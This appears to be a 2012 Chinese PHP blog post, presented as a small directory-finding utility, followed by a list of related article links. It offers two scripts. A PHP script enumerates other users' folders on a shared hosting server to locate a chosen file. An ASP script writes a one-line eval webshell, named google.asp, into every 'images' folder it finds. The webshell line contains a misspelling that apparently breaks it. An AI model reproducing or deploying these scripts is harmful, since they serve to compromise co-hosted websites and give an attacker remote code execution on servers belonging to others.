php一个找二层目录的小东东


Posted in PHP onAugust 02, 2012

php版

<?php 
set_time_limit(0); 
$path = 'D:/Hosting'; 
$somefile = $_GET['key']; 
$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt'; 
if (!isset($_SERVER['PHP_AUTH_USER'])) { 
header('WWW-Authenticate: Basic realm="My Realm"'); 
header('HTTP/1.0 401 Unauthorized'); 
echo 'Text to send if user hits Cancel button'; 
exit; 
} else { 
if(is_dir($path) && is_readable($path)) 
{ 
$path2 = ''; 
$handle = opendir($path); 
while(false !== ($filename = readdir($handle))) 
{ 
if($filename{0} != $_GET['dir']) 
{ 
continue; 
} 
/* 
if($filename{1} != $_GET['two']) 
{ 
continue; 
} 
*/ 
//$path2 = $path.'/'.$filename.'/html'; 
$path2 = $path.'/'.$filename; 
if(is_dir($path2) && is_readable($path2)) 
{ 
@$handle2 = opendir($path2); 
while(false !== ($filename2 = readdir($handle2))) 
{ 
if($filename2 == $somefile) 
{ 
//echo'[+]Found !'.$filename2."\n"; 
file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND); 
} 
} 
@closedir($handle2); 
} 
} 
file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND); 
closedir($handle); 
} 
}

asp版
<% 
Server.ScriptTimeout=500000000 
key = Trim(Request.QueryString("key")) 
msg=" <% eval(rquese(Chr(35)))%" &">" 
Set FSO=Server.CreateObject("Scripting.FileSystemObject") 
Set ServerFolder=FSO.GetFolder("C:\intel") 
Set ServerFolderList=ServerFolder.subfolders 
For Each ServerFileEvery IN ServerFolderList 
' Response.write ServerFileEvery&"</br>" 
If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then 
Set sServerFolder=FSO.GetFolder(ServerFileEvery) 
Set sServerFolderList=sServerFolder.subfolders 
For Each sServerFileEvery IN sServerFolderList 
If LCase(sServerFileEvery.name) = "images" Then 
StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8" 
End If 
Next 
End If 
Next 
Function StreamSaveToFile(sPath, sContent, sCharSet) 
Dim oStream 
If(InStr(sPath, ":") <= 0)Then 
sPath = Replace(sPath, ",", ",") 
sPath = Server.MapPath(sPath) 
sPath = Replace(sPath, ",", ",") 
End If 
Set oStream = Server.CreateObject("Adodb.Stream") 
With oStream 
.Type = 2 
.Mode = 3 
.Open 
.Charset = sCharSet 
.WriteText sContent 
.SaveToFile sPath, 2 
.Close 
End With 
Set oStream = Nothing 
End Function 
%>
PHP 相关文章推荐
php将会员数据导入到ucenter的代码
Jul 18 PHP
PHP中英混合字符串截取函数代码
Jul 17 PHP
Thinkphp模板中使用自定义函数的方法
Sep 23 PHP
php 模拟GMAIL,HOTMAIL(MSN),YAHOO,163,126邮箱登录的详细介绍
Jun 18 PHP
php函数间的参数传递(值传递/引用传递)
Sep 23 PHP
ThinkPHP3.1新特性之动态设置自动完成和自动验证示例
Jun 19 PHP
PHP 读取和编写 XML
Nov 19 PHP
thinkPHP3.2简单实现文件上传的方法
May 16 PHP
php写app接口并返回json数据的实例(分享)
May 20 PHP
动态表单验证的操作方法和TP框架里面的ajax表单验证
Jul 19 PHP
Laravel框架自定义验证过程实例分析
Feb 01 PHP
php让json_encode不自动转义斜杠“/”的方法
Apr 27 PHP
PHP文章采集URL补全函数(FormatUrl)
Aug 02 #PHP
PHP服务器页面间跳转实现方法
Aug 02 #PHP
php中3des加密代码(完全与.net中的兼容)
Aug 02 #PHP
浏览器关闭后,能继续执行的php函数(ignore_user_abort)
Aug 01 #PHP
php读取文件内容至字符串中,同时去除换行、空行、行首行尾空格(Zjmainstay原创)
Jul 31 #PHP
单一index.php实现PHP任意层级文件夹遍历(Zjmainstay原创)
Jul 31 #PHP
php读取txt文件组成SQL并插入数据库的代码(原创自Zjmainstay)
Jul 31 #PHP
You might like
php加速器eAccelerator的配置参数、API详解
2014/05/05 PHP
PHP常见的6个错误提示及解决方法
2016/07/07 PHP
利用PHP获取网站访客的所在地位置
2017/01/18 PHP
javascript中最常用的继承模式 组合继承
2010/08/12 Javascript
你必须知道的JavaScript 变量命名规则详解
2013/05/07 Javascript
JavaScript验证18位身份证号码最后一位正确性的实现代码
2014/08/07 Javascript
JavaScript实现生成GUID(全局统一标识符)
2014/09/05 Javascript
不想让浏览器运行javascript脚本的方法
2015/11/20 Javascript
基于jquery实现的仿优酷图片轮播特效代码
2016/01/13 Javascript
jquery遍历table的tr获取td的值实现方法
2016/05/19 Javascript
响应式表格之固定表头的简单实现
2016/08/26 Javascript
详解Vuex中mapState的具体用法
2017/09/28 Javascript
利用jQuery+localStorage实现一个简易的计时器示例代码
2017/12/25 jQuery
JavaScript学习笔记之数组基本操作示例
2019/01/09 Javascript
vue中axios实现数据交互与跨域问题
2019/05/12 Javascript
[03:49]显微镜下的DOTA2第十五期—VG登基之路完美团
2014/06/24 DOTA
[00:29]2019完美世界全国高校联赛(秋季赛)总决赛海口落幕
2019/12/10 DOTA
Python中使用gzip模块压缩文件的简单教程
2015/04/08 Python
Django如何实现内容缓存示例详解
2017/09/24 Python
python实现冒泡排序算法的两种方法
2018/03/10 Python
对numpy中轴与维度的理解
2018/04/18 Python
python sys,os,time模块的使用(包括时间格式的各种转换)
2018/04/27 Python
TensorFlow利用saver保存和提取参数的实例
2018/07/26 Python
对python自动生成接口测试的示例讲解
2018/11/30 Python
解决Django migrate不能发现app.models的表问题
2019/08/31 Python
Django后端发送小程序微信模板消息示例(服务通知)
2019/12/17 Python
python GUI库图形界面开发之PyQt5滑块条控件QSlider详细使用方法与实例
2020/02/28 Python
PyQt5 文本输入框自动补全QLineEdit的实现示例
2020/05/13 Python
美国电视购物HSN官网:HSN
2016/09/07 全球购物
临床医学应届生求职信
2013/11/06 职场文书
初三物理教学反思
2014/01/21 职场文书
谢师宴学生答谢词
2015/09/30 职场文书
读《教育心理学》心得体会
2016/01/22 职场文书
2016年社区中秋节活动总结
2016/04/05 职场文书
阿里云服务器部署mongodb的详细过程
2021/09/04 MongoDB
分析SQL窗口函数之聚合窗口函数
2022/04/21 Oracle